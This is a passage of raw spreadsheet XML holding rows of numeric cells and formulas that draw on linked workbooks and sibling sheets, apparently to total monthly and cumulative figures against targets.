      <c r="P37" s="218" t="s">
        <v>229</v>
      </c>
      <c r="Q37" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R37" s="231">
        <f>'[10]14'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S37" s="232">
        <f>'[10]14'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T37" s="233">
        <f>'[10]14'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U37" s="234">
        <f>T37+'13'!U37</f>
        <v>0</v>
      </c>
      <c r="V37" s="234">
        <f>U37+yc!V37</f>
        <v>0</v>
      </c>
      <c r="W37" s="235">
        <f>'[10]14'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X37" s="234">
        <f>W37+'13'!X37</f>
        <v>0</v>
      </c>
      <c r="Y37" s="235">
        <f>X37+yc!Y37</f>
        <v>0</v>
      </c>
      <c r="Z37" s="235">
        <f>'[10]14'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="38" ht="15.75" customHeight="1" spans="1:26">
      <c r="A38" s="191"/>
      <c r="B38" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C38" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D38" s="193"/>
      <c r="E38" s="194"/>
      <c r="F38" s="194"/>
      <c r="G38" s="225"/>
      <c r="H38" s="194">
        <f>G38+'13'!H38</f>
        <v>0</v>
      </c>
      <c r="I38" s="194">
        <f>H38+yc!I38</f>
        <v>0</v>
      </c>
      <c r="J38" s="194"/>
      <c r="K38" s="194">
        <f>J38+'13'!K38</f>
        <v>0</v>
      </c>
      <c r="L38" s="194">
        <f>K38+yc!L38</f>
        <v>0</v>
      </c>
      <c r="M38" s="194"/>
      <c r="N38" s="195"/>
      <c r="O38" s="200"/>
      <c r="P38" s="236"/>
      <c r="Q38" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R38" s="237">
        <f>'[10]14'!$P$10</f>
        <v>0</v>
      </c>
      <c r="S38" s="235">
        <f>'[10]14'!$Q$10</f>
        <v>9645.331</v>
      </c>
      <c r="T38" s="235">
        <f>'[10]14'!$R$10</f>
        <v>0</v>
      </c>
      <c r="U38" s="234">
        <f>T38+'13'!U38</f>
        <v>5520.34</v>
      </c>
      <c r="V38" s="234">
        <f>U38+yc!V38</f>
        <v>264660.06</v>
      </c>
      <c r="W38" s="235">
        <f>'[10]14'!$V$10</f>
        <v>0</v>
      </c>
      <c r="X38" s="234">
        <f>W38+'13'!X38</f>
        <v>7808</v>
      </c>
      <c r="Y38" s="235">
        <f>X38+yc!Y38</f>
        <v>263915</v>
      </c>
      <c r="Z38" s="235">
        <f>'[10]14'!$Y$10</f>
        <v>7357.671</v>
      </c>
    </row>
    <row r="39" ht="15.75" customHeight="1" spans="1:26">
      <c r="A39" s="191"/>
      <c r="B39" s="191"/>
      <c r="C39" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D39" s="193"/>
      <c r="E39" s="194"/>
      <c r="F39" s="194"/>
      <c r="G39" s="194"/>
      <c r="H39" s="194">
        <f>G39+'13'!H39</f>
        <v>0</v>
      </c>
      <c r="I39" s="194">
        <f>H39+yc!I39</f>
        <v>0</v>
      </c>
      <c r="J39" s="194"/>
      <c r="K39" s="194">
        <f>J39+'13'!K39</f>
        <v>0</v>
      </c>
      <c r="L39" s="194">
        <f>K39+yc!L39</f>
        <v>0</v>
      </c>
      <c r="M39" s="194"/>
      <c r="N39" s="195"/>
      <c r="O39" s="200"/>
      <c r="P39" s="236"/>
      <c r="Q39" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R39" s="231">
        <f>'[10]14'!$P$50</f>
        <v>0</v>
      </c>
      <c r="S39" s="232">
        <f>'[10]14'!$Q$50</f>
        <v>1231.546</v>
      </c>
      <c r="T39" s="238">
        <f>'[10]14'!$R$50</f>
        <v>228.34</v>
      </c>
      <c r="U39" s="234">
        <f>T39+'13'!U39</f>
        <v>3883.36</v>
      </c>
      <c r="V39" s="234">
        <f>U39+yc!V39</f>
        <v>82696.959</v>
      </c>
      <c r="W39" s="235">
        <f>'[10]14'!$V$50</f>
        <v>279</v>
      </c>
      <c r="X39" s="234">
        <f>W39+'13'!X39</f>
        <v>4048</v>
      </c>
      <c r="Y39" s="235">
        <f>X39+yc!Y39</f>
        <v>82807</v>
      </c>
      <c r="Z39" s="238">
        <f>'[10]14'!$Y$50</f>
        <v>1066.906</v>
      </c>
    </row>
    <row r="40" ht="15.75" customHeight="1" spans="1:26">
      <c r="A40" s="191"/>
      <c r="B40" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C40" s="193"/>
      <c r="D40" s="193"/>
      <c r="E40" s="194"/>
      <c r="F40" s="194"/>
      <c r="G40" s="225"/>
      <c r="H40" s="194">
        <f>G40+'13'!H40</f>
        <v>0</v>
      </c>
      <c r="I40" s="194">
        <f>H40+yc!I40</f>
        <v>0</v>
      </c>
      <c r="J40" s="194"/>
      <c r="K40" s="194">
        <f>J40+'13'!K40</f>
        <v>0</v>
      </c>
      <c r="L40" s="194">
        <f>K40+yc!L40</f>
        <v>0</v>
      </c>
      <c r="M40" s="194"/>
      <c r="N40" s="195"/>
      <c r="O40" s="200"/>
      <c r="P40" s="219"/>
      <c r="Q40" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R40" s="239">
        <f>'[10]14'!$P$44</f>
        <v>0</v>
      </c>
      <c r="S40" s="240">
        <f>'[10]14'!$Q$44</f>
        <v>0</v>
      </c>
      <c r="T40" s="238">
        <f>'[10]14'!$R$44</f>
        <v>0</v>
      </c>
      <c r="U40" s="234">
        <f>'[10]14'!$S$44</f>
        <v>0</v>
      </c>
      <c r="V40" s="234">
        <f>'[10]14'!$T$44</f>
        <v>0</v>
      </c>
      <c r="W40" s="235">
        <f>'[10]14'!$V$44</f>
        <v>0</v>
      </c>
      <c r="X40" s="234">
        <f>'[10]14'!$W$44</f>
        <v>0</v>
      </c>
      <c r="Y40" s="235">
        <f>'[10]14'!$X$44</f>
        <v>0</v>
      </c>
      <c r="Z40" s="238">
        <f>'[10]14'!$Y$44</f>
        <v>0</v>
      </c>
    </row>
    <row r="41" ht="15.75" customHeight="1" spans="1:26">
      <c r="A41" s="191" t="s">
        <v>252</v>
      </c>
      <c r="B41" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C41" s="193"/>
      <c r="D41" s="193"/>
      <c r="E41" s="194">
        <v>12000</v>
      </c>
      <c r="F41" s="194">
        <f>'[12]14'!$D$16</f>
        <v>26129.76</v>
      </c>
      <c r="G41" s="225">
        <f>'[12]14'!$E$16</f>
        <v>0</v>
      </c>
      <c r="H41" s="194">
        <f>G41+'13'!H41</f>
        <v>6522</v>
      </c>
      <c r="I41" s="194">
        <f>H41+yc!I41</f>
        <v>131498</v>
      </c>
      <c r="J41" s="194">
        <f>'[12]14'!$I$16</f>
        <v>1557.37</v>
      </c>
      <c r="K41" s="194">
        <f>J41+'13'!K41</f>
        <v>9850.28</v>
      </c>
      <c r="L41" s="194">
        <f>K41+yc!L41</f>
        <v>131243.82</v>
      </c>
      <c r="M41" s="194">
        <f>'[12]14'!$L$16</f>
        <v>22801.48</v>
      </c>
      <c r="N41" s="195">
        <f>M41/30000*100</f>
        <v>76.0049333333333</v>
      </c>
      <c r="O41" s="200"/>
      <c r="P41" s="213" t="s">
        <v>237</v>
      </c>
      <c r="Q41" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R41" s="239">
        <f>'[11]14'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S41" s="240">
        <f>'[11]14'!$Q$7</f>
        <v>0.621</v>
      </c>
      <c r="T41" s="238">
        <f>'[11]14'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U41" s="234">
        <f>T41+'13'!U41</f>
        <v>0</v>
      </c>
      <c r="V41" s="234">
        <f>U41+yc!V41</f>
        <v>0.621000000000095</v>
      </c>
      <c r="W41" s="235">
        <f>'[11]14'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X41" s="234">
        <f>W41+'13'!X41</f>
        <v>0</v>
      </c>
      <c r="Y41" s="235">
        <f>X41+yc!Y41</f>
        <v>9.45910016980633e-14</v>
      </c>
      <c r="Z41" s="238">
        <f>'[11]14'!$Y$7</f>
        <v>0.621</v>
      </c>
    </row>
    <row r="42" ht="15.75" customHeight="1" spans="1:26">
      <c r="A42" s="191"/>
      <c r="B42" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C42" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D42" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E42" s="194">
        <v>0</v>
      </c>
      <c r="F42" s="194">
        <f>'[12]14'!$D$13</f>
        <v>0</v>
      </c>
      <c r="G42" s="225">
        <f>'[12]14'!$E$13</f>
        <v>0</v>
      </c>
      <c r="H42" s="194">
        <f>G42+'13'!H42</f>
        <v>0</v>
      </c>
      <c r="I42" s="194">
        <f>H42+yc!I42</f>
        <v>0</v>
      </c>
      <c r="J42" s="194">
        <f>'[12]14'!$I$13</f>
        <v>0</v>
      </c>
      <c r="K42" s="194">
        <f>J42+'13'!K42</f>
        <v>0</v>
      </c>
      <c r="L42" s="194">
        <f>K42+yc!L42</f>
        <v>0</v>
      </c>
      <c r="M42" s="194">
        <f>'[12]14'!$L$13</f>
        <v>0</v>
      </c>
      <c r="N42" s="207">
        <f>(M42+M43)/50000*100</f>
        <v>0</v>
      </c>
      <c r="O42" s="200"/>
      <c r="P42" s="215"/>
      <c r="Q42" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R42" s="237">
        <f>'[11]14'!$P$8</f>
        <v>14000</v>
      </c>
      <c r="S42" s="238">
        <f>'[11]14'!$Q$8</f>
        <v>8478.836</v>
      </c>
      <c r="T42" s="238">
        <f>'[11]14'!$R$8</f>
        <v>1460.86</v>
      </c>
      <c r="U42" s="234">
        <f>T42+'13'!U42</f>
        <v>8715.22</v>
      </c>
      <c r="V42" s="235">
        <f>U42+yc!V42</f>
        <v>216302.19</v>
      </c>
      <c r="W42" s="235">
        <f>'[11]14'!$V$8</f>
        <v>843</v>
      </c>
      <c r="X42" s="234">
        <f>W42+'13'!X42</f>
        <v>8646</v>
      </c>
      <c r="Y42" s="235">
        <f>X42+yc!Y42</f>
        <v>211117</v>
      </c>
      <c r="Z42" s="238">
        <f>'[11]14'!$Y$8</f>
        <v>8548.056</v>
      </c>
    </row>
    <row r="43" ht="15.75" customHeight="1" spans="1:26">
      <c r="A43" s="191"/>
      <c r="B43" s="193"/>
      <c r="C43" s="193"/>
      <c r="D43" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E43" s="194"/>
      <c r="F43" s="194">
        <f>'[12]14'!$D$14</f>
        <v>0</v>
      </c>
      <c r="G43" s="225">
        <f>'[12]14'!$E$14</f>
        <v>0</v>
      </c>
      <c r="H43" s="194">
        <f>G43+'13'!H43</f>
        <v>0</v>
      </c>
      <c r="I43" s="194">
        <f>H43+yc!I43</f>
        <v>0</v>
      </c>
      <c r="J43" s="194">
        <f>'[12]14'!$I$14</f>
        <v>0</v>
      </c>
      <c r="K43" s="194">
        <f>J43+'13'!K43</f>
        <v>0</v>
      </c>
      <c r="L43" s="194">
        <f>K43+yc!L43</f>
        <v>0</v>
      </c>
      <c r="M43" s="194">
        <f>'[12]14'!$L$14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'[12]14'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H44" s="194">
        <f>G44+'13'!H44</f>
        <v>0</v>
      </c>
      <c r="I44" s="194">
        <f>H44+yc!I44</f>
        <v>128550.22</v>
      </c>
      <c r="J44" s="194">
        <f>'[12]14'!$I$44</f>
        <v>0</v>
      </c>
      <c r="K44" s="194">
        <f>J44+'13'!K44</f>
        <v>0</v>
      </c>
      <c r="L44" s="194">
        <f>K44+yc!L44</f>
        <v>0</v>
      </c>
      <c r="M44" s="194">
        <f>'[12]14'!$L$15</f>
        <v>62579.78</v>
      </c>
      <c r="N44" s="195"/>
      <c r="O44" s="200"/>
      <c r="P44" s="215"/>
      <c r="Q44" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R44" s="237">
        <f>'[11]14'!$P$29</f>
        <v>8000</v>
      </c>
      <c r="S44" s="238">
        <f>'[11]14'!$Q$29</f>
        <v>2299.457</v>
      </c>
      <c r="T44" s="238">
        <f>'[11]14'!$R$29</f>
        <v>0</v>
      </c>
      <c r="U44" s="234">
        <f>T44+'13'!U44</f>
        <v>4559.98</v>
      </c>
      <c r="V44" s="235">
        <f>U44+yc!V44</f>
        <v>69313.148</v>
      </c>
      <c r="W44" s="235">
        <f>'[11]14'!$V$29</f>
        <v>163</v>
      </c>
      <c r="X44" s="234">
        <f>W44+'13'!X44</f>
        <v>2639</v>
      </c>
      <c r="Y44" s="235">
        <f>X44+yc!Y44</f>
        <v>69049</v>
      </c>
      <c r="Z44" s="238">
        <f>'[11]14'!$Y$29</f>
        <v>4220.437</v>
      </c>
    </row>
    <row r="45" ht="15.75" customHeight="1" spans="1:26">
      <c r="A45" s="191"/>
      <c r="B45" s="193"/>
      <c r="C45" s="193"/>
      <c r="D45" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E45" s="194"/>
      <c r="F45" s="194"/>
      <c r="G45" s="225">
        <f>'[12]14'!$E$55</f>
        <v>0</v>
      </c>
      <c r="H45" s="194">
        <f>G45+'13'!H45</f>
        <v>0</v>
      </c>
      <c r="I45" s="194">
        <f>H45+yc!I45</f>
        <v>0</v>
      </c>
      <c r="J45" s="225">
        <f>'[12]14'!$I$55</f>
        <v>0</v>
      </c>
      <c r="K45" s="194">
        <f>J45+'13'!K45</f>
        <v>0</v>
      </c>
      <c r="L45" s="194">
        <f>K45+yc!L45</f>
        <v>0</v>
      </c>
      <c r="M45" s="194"/>
      <c r="N45" s="195"/>
      <c r="O45" s="200"/>
      <c r="P45" s="214"/>
      <c r="Q45" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R45" s="237">
        <f>'[11]14'!$P$23</f>
        <v>0</v>
      </c>
      <c r="S45" s="238">
        <f>'[11]14'!$Q$23</f>
        <v>0</v>
      </c>
      <c r="T45" s="238">
        <f>'[11]14'!$R$23</f>
        <v>0</v>
      </c>
      <c r="U45" s="234">
        <f>'[11]14'!$S$23</f>
        <v>0</v>
      </c>
      <c r="V45" s="235">
        <f>'[11]14'!$T$23</f>
        <v>1.329</v>
      </c>
      <c r="W45" s="235">
        <f>'[11]14'!$V$23</f>
        <v>0</v>
      </c>
      <c r="X45" s="234">
        <f>'[11]14'!$W$23</f>
        <v>0</v>
      </c>
      <c r="Y45" s="235">
        <f>'[11]14'!$X$23</f>
        <v>1.329</v>
      </c>
      <c r="Z45" s="238">
        <f>'[11]14'!$Y$23</f>
        <v>0</v>
      </c>
    </row>
    <row r="46" ht="15.75" customHeight="1" spans="1:26">
      <c r="A46" s="191"/>
      <c r="B46" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C46" s="193"/>
      <c r="D46" s="193"/>
      <c r="E46" s="194"/>
      <c r="F46" s="194"/>
      <c r="G46" s="194"/>
      <c r="H46" s="194">
        <f>G46+'13'!H46</f>
        <v>0</v>
      </c>
      <c r="I46" s="194">
        <f>H46+yc!I46</f>
        <v>0</v>
      </c>
      <c r="J46" s="194">
        <f>J47+J50</f>
        <v>0</v>
      </c>
      <c r="K46" s="194">
        <f>J46+'13'!K46</f>
        <v>0</v>
      </c>
      <c r="L46" s="194">
        <f>K46+yc!L46</f>
        <v>0</v>
      </c>
      <c r="M46" s="194"/>
      <c r="N46" s="195"/>
      <c r="O46" s="200"/>
      <c r="P46" s="242" t="s">
        <v>252</v>
      </c>
      <c r="Q46" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R46" s="237">
        <f>'[12]14'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S46" s="238">
        <f>'[12]14'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T46" s="238">
        <f>'[12]14'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U46" s="234">
        <f>T46+'13'!U46</f>
        <v>0</v>
      </c>
      <c r="V46" s="234">
        <f>U46+yc!V46</f>
        <v>0</v>
      </c>
      <c r="W46" s="235">
        <f>'[12]14'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X46" s="234">
        <f>W46+'13'!X46</f>
        <v>0</v>
      </c>
      <c r="Y46" s="235">
        <f>X46+yc!Y46</f>
        <v>0</v>
      </c>
      <c r="Z46" s="238">
        <f>'[12]14'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="47" ht="15.75" customHeight="1" spans="1:26">
      <c r="A47" s="191"/>
      <c r="B47" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C47" s="193"/>
      <c r="D47" s="193"/>
      <c r="E47" s="194">
        <v>12000</v>
      </c>
      <c r="F47" s="194"/>
      <c r="G47" s="225"/>
      <c r="H47" s="194">
        <f>G47+'13'!H47</f>
        <v>0</v>
      </c>
      <c r="I47" s="194">
        <f>H47+yc!I47</f>
        <v>0</v>
      </c>
      <c r="J47" s="194">
        <f>SUM(J48:J49)</f>
        <v>0</v>
      </c>
      <c r="K47" s="194">
        <f>J47+'13'!K47</f>
        <v>0</v>
      </c>
      <c r="L47" s="194">
        <f>K47+yc!L47</f>
        <v>0</v>
      </c>
      <c r="M47" s="194"/>
      <c r="N47" s="195"/>
      <c r="O47" s="200"/>
      <c r="P47" s="243"/>
      <c r="Q47" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R47" s="237">
        <f>'[12]14'!$P$8</f>
        <v>0</v>
      </c>
      <c r="S47" s="238">
        <f>'[12]14'!$Q$8</f>
        <v>0</v>
      </c>
      <c r="T47" s="238">
        <f>'[12]14'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U47" s="234">
        <f>T47+'13'!U47</f>
        <v>0</v>
      </c>
      <c r="V47" s="234">
        <f>U47+yc!V47</f>
        <v>0</v>
      </c>
      <c r="W47" s="235">
        <f>'[12]14'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X47" s="234">
        <f>W47+'13'!X47</f>
        <v>0</v>
      </c>
      <c r="Y47" s="235">
        <f>X47+yc!Y47</f>
        <v>0</v>
      </c>
      <c r="Z47" s="238">
        <f>'[12]14'!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="48" ht="15.75" customHeight="1" spans="1:26">
      <c r="A48" s="191"/>
      <c r="B48" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C48" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D48" s="193"/>
      <c r="E48" s="194"/>
      <c r="F48" s="194"/>
      <c r="G48" s="225"/>
      <c r="H48" s="194">
        <f>G48+'13'!H48</f>
        <v>0</v>
      </c>
      <c r="I48" s="194">
        <f>H48+yc!I48</f>
        <v>0</v>
      </c>
      <c r="J48" s="194"/>
      <c r="K48" s="194">
        <f>J48+'13'!K48</f>
        <v>0</v>
      </c>
      <c r="L48" s="194">
        <f>K48+yc!L48</f>
        <v>0</v>
      </c>
      <c r="M48" s="194"/>
      <c r="N48" s="195"/>
      <c r="O48" s="200"/>
      <c r="P48" s="243"/>
      <c r="Q48" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R48" s="237">
        <f>'[12]14'!$P$34</f>
        <v>0</v>
      </c>
      <c r="S48" s="238">
        <f>'[12]14'!$Q$34</f>
        <v>1585.503</v>
      </c>
      <c r="T48" s="238">
        <f>'[12]14'!$R$34</f>
        <v>0</v>
      </c>
      <c r="U48" s="234">
        <f>T48+'13'!U48</f>
        <v>300.06</v>
      </c>
      <c r="V48" s="234">
        <f>U48+yc!V48</f>
        <v>6326.59</v>
      </c>
      <c r="W48" s="235">
        <f>'[12]14'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X48" s="234">
        <f>W48+'13'!X48</f>
        <v>0</v>
      </c>
      <c r="Y48" s="235">
        <f>X48+yc!Y48</f>
        <v>0</v>
      </c>
      <c r="Z48" s="238">
        <f>'[12]14'!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="49" ht="15.75" customHeight="1" spans="1:26">
      <c r="A49" s="191"/>
      <c r="B49" s="191"/>
      <c r="C49" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D49" s="193"/>
      <c r="E49" s="194"/>
      <c r="F49" s="194"/>
      <c r="G49" s="194"/>
      <c r="H49" s="194">
        <f>G49+'13'!H49</f>
        <v>0</v>
      </c>
      <c r="I49" s="194">
        <f>H49+yc!I49</f>
        <v>0</v>
      </c>
      <c r="J49" s="194"/>
      <c r="K49" s="194">
        <f>J49+'13'!K49</f>
        <v>0</v>
      </c>
      <c r="L49" s="194">
        <f>K49+yc!L49</f>
        <v>0</v>
      </c>
      <c r="M49" s="194"/>
      <c r="N49" s="195"/>
      <c r="O49" s="200"/>
      <c r="P49" s="197" t="s">
        <v>304</v>
      </c>
      <c r="Q49" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R49" s="237">
        <f>'[13]14'!$P$8</f>
        <v>15340</v>
      </c>
      <c r="S49" s="238">
        <f>'[13]14'!$Q$8</f>
        <v>10593.625</v>
      </c>
      <c r="T49" s="238">
        <f>'[13]14'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U49" s="234">
        <f>T49+'13'!U49</f>
        <v>0</v>
      </c>
      <c r="V49" s="234">
        <f>U49+yc!V49</f>
        <v>179888.95</v>
      </c>
      <c r="W49" s="235">
        <f>'[13]14'!$V$8</f>
        <v>11.9</v>
      </c>
      <c r="X49" s="234">
        <f>W49+'13'!X49</f>
        <v>11.9</v>
      </c>
      <c r="Y49" s="235">
        <f>X49+yc!Y49</f>
        <v>176542.24</v>
      </c>
      <c r="Z49" s="238">
        <f>'[13]14'!$Y$8</f>
        <v>10581.725</v>
      </c>
    </row>
    <row r="50" ht="15.75" customHeight="1" spans="1:26">
      <c r="A50" s="191"/>
      <c r="B50" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C50" s="193"/>
      <c r="D50" s="193"/>
      <c r="E50" s="194"/>
      <c r="F50" s="194"/>
      <c r="G50" s="225"/>
      <c r="H50" s="194">
        <f>G50+'13'!H50</f>
        <v>0</v>
      </c>
      <c r="I50" s="194">
        <f>H50+yc!I50</f>
        <v>0</v>
      </c>
      <c r="J50" s="194"/>
      <c r="K50" s="194">
        <f>J50+'13'!K50</f>
        <v>0</v>
      </c>
      <c r="L50" s="194">
        <f>K50+yc!L50</f>
        <v>0</v>
      </c>
      <c r="M50" s="194"/>
      <c r="N50" s="195"/>
      <c r="O50" s="200"/>
      <c r="P50" s="200"/>
      <c r="Q50" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R50" s="237">
        <f>'[13]14'!$P$7</f>
        <v>200</v>
      </c>
      <c r="S50" s="238">
        <f>'[13]14'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T50" s="238">
        <f>'[13]14'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U50" s="234">
        <f>T50+'13'!U50</f>
        <v>0</v>
      </c>
      <c r="V50" s="234">
        <f>U50+yc!V50</f>
        <v>0</v>
      </c>
      <c r="W50" s="235">
        <f>'[13]14'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X50" s="234">
        <f>W50+'13'!X50</f>
        <v>0</v>
      </c>
      <c r="Y50" s="235">
        <f>X50+yc!Y50</f>
        <v>0</v>
      </c>
      <c r="Z50" s="238">
        <f>'[13]14'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="51" ht="15.75" customHeight="1" spans="1:26">
      <c r="A51" s="191" t="s">
        <v>304</v>
      </c>
      <c r="B51" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C51" s="193"/>
      <c r="D51" s="193"/>
      <c r="E51" s="194">
        <v>160000</v>
      </c>
      <c r="F51" s="194">
        <f>'[13]14'!$D$24</f>
        <v>48852.6839999998</v>
      </c>
      <c r="G51" s="225">
        <f>'[13]14'!$E$24</f>
        <v>4425</v>
      </c>
      <c r="H51" s="194">
        <f>G51+'13'!H51</f>
        <v>69723.81</v>
      </c>
      <c r="I51" s="194">
        <f>H51+yc!I51</f>
        <v>1446122.81</v>
      </c>
      <c r="J51" s="194">
        <f>'[13]14'!$I$24</f>
        <v>4006.04</v>
      </c>
      <c r="K51" s="194">
        <f>J51+'13'!K51</f>
        <v>69125.26</v>
      </c>
      <c r="L51" s="194">
        <f>K51+yc!L51</f>
        <v>1432249.191</v>
      </c>
      <c r="M51" s="194">
        <f>'[13]14'!$L$24</f>
        <v>49297.4239999998</v>
      </c>
      <c r="N51" s="195">
        <f>M51/45000*100</f>
        <v>109.549831111111</v>
      </c>
      <c r="O51" s="200"/>
      <c r="P51" s="200"/>
      <c r="Q51" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R51" s="237">
        <f>'[13]14'!$P$30</f>
        <v>8550</v>
      </c>
      <c r="S51" s="238">
        <f>'[13]14'!$Q$30</f>
        <v>3251.37400000001</v>
      </c>
      <c r="T51" s="238">
        <f>'[13]14'!$R$30</f>
        <v>0</v>
      </c>
      <c r="U51" s="234">
        <f>T51+'13'!U51</f>
        <v>3001.33</v>
      </c>
      <c r="V51" s="234">
        <f>U51+yc!V51</f>
        <v>65999.801</v>
      </c>
      <c r="W51" s="235">
        <f>'[13]14'!$V$30</f>
        <v>198.85</v>
      </c>
      <c r="X51" s="234">
        <f>W51+'13'!X51</f>
        <v>2946.688</v>
      </c>
      <c r="Y51" s="235">
        <f>X51+yc!Y51</f>
        <v>63562.925</v>
      </c>
      <c r="Z51" s="238">
        <f>'[13]14'!$Y$30</f>
        <v>3306.01600000001</v>
      </c>
    </row>
    <row r="52" ht="15.75" customHeight="1" spans="1:26">
      <c r="A52" s="191"/>
      <c r="B52" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C52" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D52" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E52" s="194">
        <v>175000</v>
      </c>
      <c r="F52" s="194">
        <f>'[13]14'!$D$19</f>
        <v>105046.44300005</v>
      </c>
      <c r="G52" s="225">
        <f>'[13]14'!$E$19</f>
        <v>2e-11</v>
      </c>
      <c r="H52" s="194">
        <f>G52+'13'!H52</f>
        <v>2.8e-10</v>
      </c>
      <c r="I52" s="194">
        <f>H52+yc!I52</f>
        <v>1383567.25</v>
      </c>
      <c r="J52" s="194">
        <f>'[13]14'!$I$19</f>
        <v>3517.06</v>
      </c>
      <c r="K52" s="194">
        <f>J52+'13'!K52</f>
        <v>67010.038</v>
      </c>
      <c r="L52" s="194">
        <f>K52+yc!L52</f>
        <v>1348704.238</v>
      </c>
      <c r="M52" s="194">
        <f>'[13]14'!$L$19</f>
        <v>38036.4050000505</v>
      </c>
      <c r="N52" s="207">
        <f>(M52+M53)/(65000+80000)*100</f>
        <v>26.2320034483107</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'[13]14'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G53" s="225">
        <f>'[13]14'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H53" s="194">
        <f>G53+'13'!H53</f>
        <v>0</v>
      </c>
      <c r="I53" s="194">
        <f>H53+yc!I53</f>
        <v>0</v>
      </c>
      <c r="J53" s="194">
        <f>'[13]14'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K53" s="194">
        <f>J53+'13'!K53</f>
        <v>0</v>
      </c>
      <c r="L53" s="194">
        <f>K53+yc!L53</f>
        <v>0</v>
      </c>
      <c r="M53" s="194">
        <f>'[13]14'!$L$23</f>
        <v>0</v>
      </c>
      <c r="N53" s="212"/>
      <c r="O53" s="200"/>
      <c r="P53" s="223" t="s">
        <v>262</v>
      </c>
      <c r="Q53" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R53" s="245"/>
      <c r="S53" s="237">
        <f>'[14]14'!$M$21+'[14]14'!$M$22+'[14]14'!$M$35</f>
        <v>1648.947</v>
      </c>
      <c r="T53" s="237">
        <f>'[14]14'!$N$21+'[14]14'!$N$22+'[14]14'!$N$35</f>
        <v>86.86</v>
      </c>
      <c r="U53" s="234">
        <f>T53+'13'!U53</f>
        <v>728.52</v>
      </c>
      <c r="V53" s="234">
        <f>U53+yc!V53</f>
        <v>39062.947</v>
      </c>
      <c r="W53" s="237">
        <f>'[14]14'!$Q$21+'[14]14'!$Q$22+'[14]14'!$Q$35</f>
        <v>66</v>
      </c>
      <c r="X53" s="234">
        <f>W53+'13'!X53</f>
        <v>693</v>
      </c>
      <c r="Y53" s="235">
        <f>X53+yc!Y53</f>
        <v>40184</v>
      </c>
      <c r="Z53" s="237">
        <f>'[14]14'!$T$21+'[14]14'!$T$22+'[14]14'!$T$35</f>
        <v>1684.467</v>
      </c>
    </row>
    <row r="54" ht="15.75" customHeight="1" spans="1:26">
      <c r="A54" s="191"/>
      <c r="B54" s="193"/>
      <c r="C54" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D54" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E54" s="194"/>
      <c r="F54" s="194"/>
      <c r="G54" s="225">
        <f>'[13]14'!$E$23</f>
        <v>0</v>
      </c>
      <c r="H54" s="194">
        <f>G54+'13'!H54</f>
        <v>0</v>
      </c>
      <c r="I54" s="194">
        <f>H54+yc!I54</f>
        <v>0</v>
      </c>
      <c r="J54" s="194">
        <f>'[13]14'!$I$47</f>
        <v>0</v>
      </c>
      <c r="K54" s="194">
        <f>J54+'13'!K54</f>
        <v>10672.645</v>
      </c>
      <c r="L54" s="194">
        <f>K54+yc!L54</f>
        <v>222114.495</v>
      </c>
      <c r="M54" s="194">
        <f>'[13]14'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N54" s="195"/>
      <c r="O54" s="200"/>
      <c r="P54" s="246" t="s">
        <v>263</v>
      </c>
      <c r="Q54" s="242" t="s">
        <v>279</v>
      </c>
      <c r="R54" s="247">
        <f>'[15]14'!$C$43</f>
        <v>0</v>
      </c>
